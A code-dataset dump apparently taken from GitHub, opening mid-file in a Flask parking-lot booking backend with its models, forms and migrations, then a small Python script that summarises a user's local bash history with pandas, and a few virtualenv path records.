db.session.delete(cur_token)\n db.session.commit()\n print('currrrrr', cur_token.uuid)\n logout_user()\n flash(\"You have logged out\")\n return redirect(url_for(\"index\"))\n\n\[email protected](\"/\")\ndef index():\n print('alolalalala')\n # cur_building = Building.query.filter_by(id = 1). 
first()\n # cur_user = User.query.filter_by(id = 1).first()\n # print('currrr', cur_user.parkings , cur_building)\n return render_template(\"home.html\")\n\n\[email protected](\"/booking\", methods = ['POST', 'GET'])\ndef booking():\n if request.method == 'POST':\n data = request.get_json()\n print(data['idx'], type(data['idx']))\n cur_parking = Parking.query.filter_by(id = data['idx']).first()\n print( cur_parking.book_by, current_user.id)\n if cur_parking.status =='Booked':\n # if current_user.id == cur_parking.book_by:\n cur_parking.status = 'Available'\n cur_parking.status_color = 'green'\n cur_parking.owneruser = None\n cur_parking.time_booking = None\n cur_parking.in_use_status = 'not_use'\n db.session.commit()\n else:\n time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cur_parking.status = \"Booked\"\n cur_parking.status_color = \"red\"\n cur_parking.book_by = current_user.id\n cur_parking.time_booking = time\n cur_parking.in_use_status = 'booking'\n db.session.commit()\n return jsonify (\"You are booking this lot\")\[email protected](\"/parking/checkin/<idx>\", methods = ['POST', 'GET'])\ndef checkin(idx):\n data = request.get_json()\n cur_parking = Parking.query.filter_by(id = data['idx']).first()\n cur_building= cur_parking.building_id\n time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cur_parking.in_use_status = 'using'\n new_transaction = Transaction(user = current_user.id, building = cur_building,\n parking = cur_parking.id , time_check_in = time , price = cur_parking.price,\n ticket_qrcode = \"http://vairen.aien.vn/images/aien-imgs/huongdan.png\")\n db.session.add(new_transaction)\n db.session.commit()\n return jsonify(\"Success Checkin!\")\[email protected](\"/parking/<park_id>/checkout/<trans_id>\", methods = ['POST', 'GET'])\ndef checkout(park_id , trans_id):\n data = request.get_json()\n cur_parking = Parking.query.filter_by(id = data['park_id']).first()\n cur_transaction = Transaction.query.filter_by(id = data['trans_id']).first()\n time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cur_transaction.time_check_out = time\n cur_transaction.status = 'success'\n db.session.commit()\n time_lot = int((cur_transaction.time_check_out - cur_transaction.time_check_in).total_seconds())/60\n cur_transaction.totalbill = int(time_lot * cur_transaction.price/60)\n if cur_transaction.totalbill == 0:\n cur_transaction.totalbill = cur_transaction.price\n cur_transaction.time_lot = str(time_lot)\n cur_parking.status = 'Available'\n cur_parking.in_use_status = 'not_use'\n cur_parking.status_color = 'green'\n cur_parking.time_booking = None\n cur_parking.book_by = None\n print('########################', time , cur_transaction.time_check_in , cur_transaction.time_lot)\n db.session.commit()\n\n return jsonify(\"Success Checkout!\")\n\[email protected](\"/parking/order\", methods = ['POST', 'GET'])\ndef list_order():\n if request.method == \"GET\": \n trans_schema = TransactionSchema()\n print(current_user)\n out_put = trans_schema.dump(current_user).data\n return jsonify({'data': out_put} ) \n\n\n \n\n\[email protected](\"/addparking\", methods = ['POST', 'GET'])\ndef addParking():\n if request.method == 'POST':\n data = request.get_json()\n if data['nums'] == 0:\n new_parking = Parking(name =data['name'], building_id = data['building_id'], status ='Available', price =data['price'])\n db.session.add(new_parking)\n db.session.commit()\n return jsonify('Success adding')\n else:\n for i in range (0,data['nums']):\n new_parking = Parking(name =data['name'], building_id = 
data['building_id'], status ='Available', price =data['price'])\n db.session.add(new_parking)\n db.session.commit()\n return jsonify('Success adding!')\n\n\n \[email protected](\"/parking/edit/<idx>\", methods = ['POST', 'GET'])\ndef edit_parking(idx):\n data = request.get_json()\n cur_parking = Parking.query.filter_by(id = idx).first()\n cur_parking.name = data['parkingname']\n cur_parking.price = data['parkingprice']\n db.session.commit()\n return jsonify(\"Updated...\")\n\[email protected](\"/deleteparking\",methods = ['POST','GET'])\ndef deleteParking():\n data = request.get_json()\n delete_park = Parking.query.filter_by(id = int(data['parking_id'])).first()\n cur_transaction = Transaction.query.filter_by(parking =int(data['parking_id']), status = 'Checkin').first()\n if cur_transaction is not None:\n cur_transaction.status = 'cancel_by_admin'\n else:\n pass\n db.session.delete(delete_park)\n db.session.commit()\n return jsonify('hello deleteddddd')\n\n\[email protected](\"/user/signup\", methods = ['POST', ' GET'])\ndef signup():\n if request.method == 'POST':\n form = SignupForm.from_json(request.json)\n # data = request.get_json()\n print('suifhawduihasiudhasiud', form)\n if form.validate():\n new_user = User(name = form.sname.data, email =form.semail.data)\n new_user.set_password(form.spassword.data)\n db.session.add(new_user)\n db.session.commit()\n new_add_user = User.query.filter_by(name = form.sname.data).first()\n new_profile = ProfileUser(user_id = new_add_user.id, address = form.saddress.data)\n db.session.add(new_profile)\n db.session.commit()\n return jsonify(\"success!\")\n # return redirect(\"http://localhost:3000/sign-in\")\n else:\n print('checkcekcekcekeckcekce!!!!!!')\n return jsonify(form.errors)\n return jsonify(\"success!\")\[email protected](\"/facebooklogin\")\ndef log():\n return render_template(\"home.html\")\n\[email protected](\"/user/signin\", methods =['POST', 'GET'])\ndef signin():\n if request.method == 'POST':\n form = SigninForm.from_json(request.json)\n if form.validate():\n log_user = User.query.filter_by(name=form.username.data).first()\n if log_user is None:\n error = \"Wrong username\"\n form.username.errors.append(error)\n return jsonify({'error': \"wrong username\"})\n elif not log_user.check_password(form.password.data):\n error = \"Wrong password\"\n form.password.errors.append(error)\n print('efhuiqehiuwefhwiuefhwieufwueifweiufhweiufhwiuefweuhif')\n return jsonify({'error': \"wrong password\"})\n else:\n login_user(log_user)\n token_query = Token.query.filter_by(user_id=current_user.id).first()\n if token_query is not None:\n token = token_query\n else: \n token = Token(user_id=current_user.id, uuid=str(uuid.uuid4().hex)) \n db.session.add(token)\n db.session.commit()\n return jsonify({ 'status': 'ok' , 'token': token.uuid})\n else:\n return jsonify(\"form.errors!\")\n return 'login Please'\n \n\[email protected](\"/get/data\", methods = ['POST', 'GET'])\ndef data_dumps():\n if request.method == \"GET\":\n user_schema = UserSchema()\n\n out_put = user_schema.dumps(current_user)\n return jsonify({'dataaa': out_put})\n\[email protected](\"/user/data\", methods = ['POST', 'GET'])\n@login_required\ndef data_user():\n if request.method == \"GET\": \n user_schema = UserSchema() \n cur_buidling = Building.query.filter_by(user = current_user.id).first()\n cur_time = datetime.now()\n cur_trans = Transaction.query.filter_by(user = current_user.id).all()\n trans_schema = TransactionSchema(many = True)\n # total_trans = 
Transaction.query.filter(Transaction.building == cur_buidling.id, Transaction.time_check_out < (cur_time - timedelta(days = 1)) ).with_entities( Transaction.building, func.sum(Transaction.totalbill)).group_by(Transaction.building).all()\n out_put = user_schema.dump(current_user).data\n trans_out_put = trans_schema.dump(cur_trans).data\n return jsonify({'data': out_put , 'transaction': trans_out_put}) \n else:\n form = EditProfileForm.from_json(request.json)\n data = request.get_json()\n print('datataatatfiatatatat', data)\n if form.validate():\n cur_profile = ProfileUser.query.filter_by(user_id = current_user.id).first()\n cur_profile.first_name = form.firstname.data\n cur_profile.last_name = form.lastname.data\n current_user.email = data['email']\n cur_profile.address = data['address']\n cur_profile.phone = data['phone']\n cur_profile.avatar_url = data['avatar']\n db.session.commit()\n return jsonify(\"success!\")\n else:\n return jsonify(form.errors)\n return jsonify({'data': data})\n\n\n # datastore = json.loads(data)\n\n\[email protected](\"/addbuilding\", methods = ['POST', 'GET'])\ndef addbuilding():\n if request.method == 'POST':\n data = request.get_json()\n print('datattatatatat', data['buildingname'], current_user)\n newbuilding = Building(user = current_user.id, buildingname = data['buildingname'], buildingcontact = data['buildingcontact'], location = data['location'], description = data['description'], street_location = data['street'])\n db.session.add(newbuilding)\n db.session.commit()\n return jsonify(data)\n else:\n pass\[email protected](\"/updatebuilding\", methods = ['POST', 'GET'])\ndef updatebuilding():\n if request.method == 'POST':\n data = request.get_json()\n print('datattatatatat', data['buildingname'], current_user)\n cur_building = Building.query.filter_by(user = current_user.id).first()\n cur_building.buildingname = data['buildingname']\n cur_building.buildingcontact = data['buildingcontact']\n cur_building.location = data['location']\n cur_building.description = data['description']\n cur_building.totalparkingslot = data['totalparkingslot']\n cur_building.image_url = data['image_url']\n db.session.commit()\n return jsonify(data)\n else:\n pass\n\n\n\[email protected](\"/data/building\", methods = ['POST', 'GET'])\ndef data_user_building():\n if request.method == \"GET\" :\n building_available = Building.query.all()\n total_lot = Parking.query.with_entities(Parking.building_id, func.count(Parking.status)).group_by(Parking.building_id).all()\n avaivale_lot = Parking.query.with_entities(Parking.building_id, func.count(Parking.status)).group_by(Parking.building_id).filter_by(status = 'Available').all()\n print (total_lot, avaivale_lot)\n building_schema = BuildingSchema(many = True , exclude = 'totaltransaction') \n out_put = building_schema.dump(building_available).data\n return jsonify({'data': out_put, 'total_lot': total_lot , 'avaivale_lot': avaivale_lot } ) \n else:\n data = request.get_json()\n print('datattatatatat', data)\n # datastore = json.loads(data)\[email protected](\"/data/building/<idx>\", methods = ['POST', 'GET'])\ndef data_user_building_parking(idx):\n if request.method == \"GET\" : \n current_building = Building.query.filter_by(id = idx).first()\n building_schema = BuildingSchema() \n out_put = building_schema.dump(current_building).data\n return jsonify({'data': out_put} ) \n \[email protected](\"/manage/building\", methods = ['POST', 'GET'])\ndef manage_building():\n if request.method == 'GET':\n current_building = Building.query.filter_by(user 
= current_user.id).first()\n building_schema = BuildingSchema() \n out_put = building_schema.dump(current_building).data\n return jsonify({'data': out_put } ) \n else:\n return jsonify('helo')\n\n\[email protected]('interval', id='do_job_1', minutes= 5, misfire_grace_time=900)\ndef job1():\n with db.app.app_context():\n check_parking = Parking.query.filter_by( in_use_status = 'booking' ).all()\n # # cur_parking = Parking.query.filter_by(id =37).first()\n time_now = datetime.now()\n print('is running?')\n # time_check = time_now - cur_parking.time_booking\n # print('timechecking', time_check)\n for cur_parking in check_parking:\n if ((time_now - cur_parking.time_booking).total_seconds() > 900):\n print(((time_now - cur_parking.time_booking)))\n cur_parking.status = 'Available'\n cur_parking.status_color = 'green'\n cur_parking.owneruser = None\n cur_parking.time_booking = None\n cur_parking.in_use_status = 'not_use'\n db.session.commit()\n\n"
},
{
"alpha_fraction": 0.6759011745452881,
"alphanum_fraction": 0.6864473223686218,
"avg_line_length": 37.503028869628906,
"blob_id": "2f254ac4b8a4fa86c5a99a3e7e5819587e2c755d",
"content_id": "1c03652eced3114cb0ae14b846e0ebe72e18780b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6353,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 165,
"path": "/app/models.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "from flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import types\nfrom flask_login import LoginManager, UserMixin\nfrom flask_dance.consumer.storage.sqla import OAuthConsumerMixin\nfrom flask_marshmallow import Marshmallow\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom wtforms.fields.html5 import DateTimeLocalField\nimport datetime\nfrom sqlalchemy import desc\n\ndb = SQLAlchemy()\nma = Marshmallow()\n\nclass ProfileUser(db.Model):\n __tablename__=\"profile\"\n id = db.Column(db.Integer, primary_key = True)\n first_name = db.Column(db.String(80))\n last_name = db.Column(db.String(80))\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n avatar_url = db.Column(db.String, default = 'https://pbs.twimg.com/profile_images/787106179482869760/CwwG2e2M_400x400.jpg')\n phone = db.Column(db.Integer)\n address = db.Column(db.String)\n created_at = db.Column(db.DateTime, server_default=db.func.now())\n updated_at = db.Column(\n db.DateTime, server_default=db.func.now(), server_onupdate=db.func.now())\n\n\nclass Price(db.Model):\n __tablename__='price'\n id = db.Column(db.Integer, primary_key= True)\n pricetype = db.Column(db.String)\n price = db.Column(db.Integer)\nclass Transaction(db.Model):\n __tablename__ = \"transaction\"\n id = db.Column(db.Integer, primary_key= True)\n user = db.Column(db.Integer, db.ForeignKey('users.id'))\n building = db.Column(db.Integer, db.ForeignKey('building.id'))\n parking =db.Column(db.Integer, db.ForeignKey('parking.id'))\n price = db.Column(db.Integer)\n status = db.Column(db.String, default = 'Checkin')\n ticket_qrcode = db.Column(db.String)\n time_check_in = db.Column(\n db.DateTime , default = None)\n time_check_out = db.Column(\n db.DateTime, default = None)\n\n time_lot = db.Column(db.String)\n totalbill = db.Column(db.Integer)\n\nclass Parking(db.Model):\n __tablename__=\"parking\"\n id = db.Column(db.Integer,primary_key = True)\n name = db.Column(db.String, default = 'No.')\n building_id = db.Column(db.Integer, db.ForeignKey('building.id'))\n transaction = db.relationship('Transaction', backref = 'parkingtrans' ,order_by = 'desc(Transaction.id)')\n status = db.Column(db.String, default = 'Available')\n status_color = db.Column(db.String, default = 'green')\n book_by = db.Column(db.Integer, db.ForeignKey('users.id'))\n time_booking = db.Column(db.DateTime)\n price = db.Column(db.Integer)\n in_use_status = db.Column(db.String, default = 'not_use')\n \nclass Building(db.Model):\n __tablename__=\"building\"\n id = db.Column(db.Integer, primary_key = True)\n user = db.Column(db.Integer, db.ForeignKey('users.id'))\n buildingname = db.Column(db.String, unique = True)\n buildingcontact = db.Column(db.String)\n image_url = db.Column(db.String , default = 'http://images.adsttc.com/media/images/51d4/84a8/b3fc/4bea/e100/01d6/medium_jpg/Portada.jpg?1372882078')\n location = db.Column(db.String)\n description = db.Column(db.String)\n totalparkingslot = db.Column(db.Integer)\n parkings = db.relationship('Parking', backref = 'parkinglot', order_by = 'Parking.id')\n totaltransaction = db.relationship('Transaction', backref= 'totaltrans', order_by ='desc(Transaction.id)')\n street_location = db.Column(db.String)\n\nclass User(UserMixin, db.Model):\n __tablename__='users'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True)\n email = db.Column(db.String(255) , unique= True)\n password = db.Column(db.String(255))\n profiles = db.relationship('ProfileUser', backref= 'owneruser')\n 
building = db.relationship('Building', backref= 'owneruser')\n transactions = db.relationship('Transaction', backref='owneruser', order_by = 'desc(Transaction.id)')\n parkings = db.relationship('Parking', backref = 'owneruser' )\n\n def __repr__(self):\n return \"{}\".format(self.name)\n\n def set_password(self, password):\n self.password = generate_password_hash(password)\n\n def check_password(self, password):\n return check_password_hash(self.password, password)\n\nclass OAuth(OAuthConsumerMixin, db.Model):\n provider_user_id = db.Column(db.String(256), unique=True, nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)\n user = db.relationship(User)\n\n\nclass Token(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n uuid = db.Column(db.String, unique=True)\n user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)\n user = db.relationship(User, backref = 'token_user')\n\n\n\nclass UserSchema(ma.ModelSchema):\n\n class Meta:\n model = User\n ordered = True\n building = ma.Nested('BuildingSchema', many = True, ordered= True)\n profiles = ma.Nested('ProfileSchema', many=True)\n # transactions = ma.Nested('TransactionSchema', many =True,ordered= True)\n parkings = ma.Nested('ParkingSchema', many = True , ordered = True)\n\nclass BuildingSchema(ma.ModelSchema):\n \n class Meta:\n model = Building\n ordered = True\n parkings = ma.Nested('ParkingSchema', many = True,ordered= True)\n totaltransaction = ma.Nested('TransactionSchema', many =True,ordered= True)\nclass ParkingSchema(ma.ModelSchema):\n \n class Meta:\n ordered = True\n model = Parking\n transaction = ma.Nested('TransactionSchema', many =True,ordered= True)\n owneruser = ma.Nested('UserSchema', exclude=('building', 'parkings','transaction'))\n parkinglot = ma.Nested('BuildingSchema', exclude = ('parkings' , 'transaction'))\nclass TransactionSchema(ma.ModelSchema):\n class Meta:\n model = Transaction\n ordered = True\n\nclass ProfileSchema(ma.ModelSchema):\n class Meta:\n model = ProfileUser\n ordered = True\n\n# setup login manager\nlogin_manager = LoginManager()\nlogin_manager.login_view = \"facebook.login\"\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n@login_manager.request_loader\ndef load_user_from_request(request):\n # Login Using our Custom Header\n api_key = request.headers.get('Authorization')\n if api_key:\n api_key = api_key.replace('Token ', '', 1)\n token = Token.query.filter_by(uuid=api_key).first()\n if token:\n return token.user\n\n return None\n"
},
{
"alpha_fraction": 0.6282246112823486,
"alphanum_fraction": 0.67678302526474,
"avg_line_length": 22.535715103149414,
"blob_id": "a681320c0338e08dceca5c61fbce128477e64f57",
"content_id": "ac0fdf5ec8003f0737aebd905679b879263b0926",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 659,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 28,
"path": "/migrations/versions/c5da706b2e1f_.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "\"\"\"empty message\n\nRevision ID: c5da706b2e1f\nRevises: 7a6929cbc905\nCreate Date: 2019-07-30 10:47:59.022050\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c5da706b2e1f'\ndown_revision = '7a6929cbc905'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('building', sa.Column('street_location', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('building', 'street_location')\n # ### end Alembic commands ###\n"
},
{
"alpha_fraction": 0.6949428915977478,
"alphanum_fraction": 0.6949428915977478,
"avg_line_length": 42.71428680419922,
"blob_id": "7e96745b7fbd826edc29c9c8dc1839a915e9b0aa",
"content_id": "53a8dc66ada37339ca0c5f45795c63dc20f8b25b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1839,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 42,
"path": "/app/forms.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, PasswordField, ValidationError, TextAreaField,SelectField\nfrom wtforms.validators import DataRequired, Email, EqualTo, Length , InputRequired\nfrom .models import User\n\nclass SignupForm(FlaskForm):\n class Meta():\n csrf= False\n sname = StringField('User name', validators=[DataRequired()])\n semail = StringField('Email', validators=[DataRequired(), Email(\"This field require an email address\")])\n spassword = PasswordField(\"Password\", validators=[DataRequired()])\n sconfirm = PasswordField(\"ConFirmPassword\", validators=[DataRequired(), EqualTo('spassword')])\n saddress = StringField(\"Address\", validators=[DataRequired()])\n submit =SubmitField('Sign Up')\n def validate_sname(self, field):\n if User.query.filter_by(name=field.data).first():\n raise ValidationError(\"Your username has been registered!!!\")\n\n def validate_semail(self, field):\n if User.query.filter_by(email=field.data).first():\n raise ValidationError(\"Your email has been registered!!!\")\n\nclass SigninForm(FlaskForm):\n class Meta:\n csrf = False\n username = StringField('User name', validators=[DataRequired()])\n password = PasswordField(\"Password\", validators=[DataRequired()])\n submit =SubmitField('Sign In')\n\n\n\nclass EditProfileForm(FlaskForm):\n class Meta:\n csrf = False\n firstname = StringField('Name', validators=[DataRequired()])\n lastname = StringField('Name', validators=[DataRequired()])\n email = StringField('Email', validators=[DataRequired()])\n phone = StringField('Phone')\n avatar = StringField('Avatar')\n address = StringField('Address')\n # submit = SubmitField('Change')\n # password = PasswordField(\"Password\", validators=[DataRequired()])\n\n\n\n"
},
{
"alpha_fraction": 0.643660306930542,
"alphanum_fraction": 0.6508336663246155,
"avg_line_length": 40.263999938964844,
"blob_id": "4ea9afea750267863dc15f683ccb27f29eddafdf",
"content_id": "f5dd848cc84d6badc31e927bde129165163615f8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5158,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 125,
"path": "/migrations/versions/7a6929cbc905_.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "\"\"\"empty message\n\nRevision ID: 7a6929cbc905\nRevises: \nCreate Date: 2019-07-29 16:03:52.942820\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n# revision identifiers, used by Alembic.\nrevision = '7a6929cbc905'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('price',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('pricetype', sa.String(), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=80), nullable=True),\n sa.Column('email', sa.String(length=255), nullable=True),\n sa.Column('password', sa.String(length=255), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('name')\n )\n op.create_table('building',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user', sa.Integer(), nullable=True),\n sa.Column('buildingname', sa.String(), nullable=True),\n sa.Column('buildingcontact', sa.String(), nullable=True),\n sa.Column('image_url', sa.String(), nullable=True),\n sa.Column('location', sa.String(), nullable=True),\n sa.Column('description', sa.String(), nullable=True),\n sa.Column('totalparkingslot', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('buildingname')\n )\n op.create_table('flask_dance_oauth',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('provider', sa.String(length=50), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('token', sqlalchemy_utils.types.json.JSONType(), nullable=False),\n sa.Column('provider_user_id', sa.String(length=256), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('provider_user_id')\n )\n op.create_table('profile',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=80), nullable=True),\n sa.Column('last_name', sa.String(length=80), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('avatar_url', sa.String(), nullable=True),\n sa.Column('phone', sa.Integer(), nullable=True),\n sa.Column('address', sa.String(), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('token',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('uuid', sa.String(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('uuid')\n )\n op.create_table('parking',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=True),\n sa.Column('building_id', sa.Integer(), nullable=True),\n sa.Column('status', sa.String(), nullable=True),\n sa.Column('status_color', sa.String(), nullable=True),\n sa.Column('book_by', sa.Integer(), nullable=True),\n sa.Column('time_booking', sa.DateTime(), nullable=True),\n sa.Column('price', 
sa.Integer(), nullable=True),\n sa.Column('in_use_status', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['book_by'], ['users.id'], ),\n sa.ForeignKeyConstraint(['building_id'], ['building.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('transaction',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user', sa.Integer(), nullable=True),\n sa.Column('building', sa.Integer(), nullable=True),\n sa.Column('parking', sa.Integer(), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.Column('status', sa.String(), nullable=True),\n sa.Column('ticket_qrcode', sa.String(), nullable=True),\n sa.Column('time_check_in', sa.DateTime(), nullable=True),\n sa.Column('time_check_out', sa.DateTime(), nullable=True),\n sa.Column('time_lot', sa.String(), nullable=True),\n sa.Column('totalbill', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['building'], ['building.id'], ),\n sa.ForeignKeyConstraint(['parking'], ['parking.id'], ),\n sa.ForeignKeyConstraint(['user'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('transaction')\n op.drop_table('parking')\n op.drop_table('token')\n op.drop_table('profile')\n op.drop_table('flask_dance_oauth')\n op.drop_table('building')\n op.drop_table('users')\n op.drop_table('price')\n # ### end Alembic commands ###\n"
}
] | 5 |
weavermonkey/bash_history_to_pandas | https://github.com/weavermonkey/bash_history_to_pandas | 16c9f6bb8779cd636a9a28a17b5ef250d64c3f6a | 9a89268daf3f87ade900bb5c777eae5560baf5dc | 5a9326d958278cfe301da111c0a380227322534f | refs/heads/master | 2021-05-05T21:19:22.418573 | 2017-12-27T13:30:32 | 2017-12-27T13:30:32 | 115,520,158 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7878788113594055,
"alphanum_fraction": 0.7878788113594055,
"avg_line_length": 65,
"blob_id": "91b7e8499c4094776110ab873a926f131827670b",
"content_id": "89babb952a63c24b767ff0e61de46ed008111b84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 2,
"path": "/README.md",
"repo_name": "weavermonkey/bash_history_to_pandas",
"src_encoding": "UTF-8",
"text": "# bash_history_to_pandas\nSave Ubuntu's bash history to a CSV, use pandas to get the first and last command every day with timestamp\n"
},
{
"alpha_fraction": 0.6672012805938721,
"alphanum_fraction": 0.6696070432662964,
"avg_line_length": 37.96875,
"blob_id": "6144abc4993f3966db5ce11471a726cea9547794",
"content_id": "322e8758f87a3bce07104fc565e5712eeccc6ab3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 32,
"path": "/first_last_command.py",
"repo_name": "weavermonkey/bash_history_to_pandas",
"src_encoding": "UTF-8",
"text": "from os import path\nfrom datetime import datetime\nimport pandas as pd\n\nhistory_dict = {'dt':[],'command':[]}\nhistory_timestamps = []\nhistory_commands = []\n\ndef create_dataframe_from_bash_history():\n\tfor curr_line in open( path.expanduser( '~/.bash_history' ),'rb' ):\n\t\tif curr_line[0] == '#':\n\t\t\thistory_timestamps.append( datetime.fromtimestamp( float( curr_line[1:].strip() ) ) )\n\n\t\telif curr_line[0] != '#' and curr_line != '':\n\t\t\thistory_commands.append(curr_line.strip())\n\t\n\tfor i in range( len( history_timestamps ) ):\n\t\thistory_dict['dt'].append(history_timestamps[i])\n\t\thistory_dict['command'].append(history_commands[i])\n\t\n\tpd_df = pd.DataFrame.from_dict( history_dict )\n\treturn pd_df\n\ndef print_first_last_command_per_day():\n\thistory_df = create_dataframe_from_bash_history()\n\thistory_df['dt'] = pd.to_datetime( history_df['dt'], format='%Y-%m-%d %H:%M:%S' )\n\tfirst_commands = history_df.groupby(history_df['dt'].dt.date).first()\n\tlast_commands = history_df.groupby(history_df['dt'].dt.date).last()\n\tfor i in range ( len(first_commands) ):\n\t\tprint first_commands.dt.iloc[i],first_commands.command.iloc[i],'\\n', last_commands.dt.iloc[i],last_commands.command.iloc[i],'\\n______________________________'\n\nprint_first_last_command_per_day()\n"
}
] | 2 |
trialrepo/python-flask-formio-gcp | https://github.com/trialrepo/python-flask-formio-gcp | 63693bf1ab2a281b4652dc3ae525939780f2ee8c | 8e3bf420a373844b40db8849766e059aa31cac65 | 30e01d3434523e6eb7f2a02e78a07500764ee5b7 | refs/heads/master | 2020-03-21T12:24:31.228808 | 2018-06-25T06:14:33 | 2018-06-25T06:14:33 | 138,551,001 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7799999713897705,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 50,
"blob_id": "c256ed1c5d86450eb86d61d5a09074d79d30b673",
"content_id": "5ceaf6c4ac01295d7a3b882dd440d831ea1d30d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 1,
"path": "/env/lib/python3.6/tempfile.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/tempfile.py"
},
{
"alpha_fraction": 0.7799999713897705,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 50,
"blob_id": "3c4fe54d2db5f699e801672fd5bae1109afdf78b",
"content_id": "118df5fcfd5236bc1c6f7686a35c176afe945a5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 1,
"path": "/env/lib/python3.6/tokenize.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/tokenize.py"
},
{
"alpha_fraction": 0.7799999713897705,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 50,
"blob_id": "b9f3ced9aa6e7188b61a5f441c7da42280dfbfdf",
"content_id": "d76fddcd4883acd1cd038b6071607026db36f1c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 1,
"path": "/env/lib/python3.6/operator.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
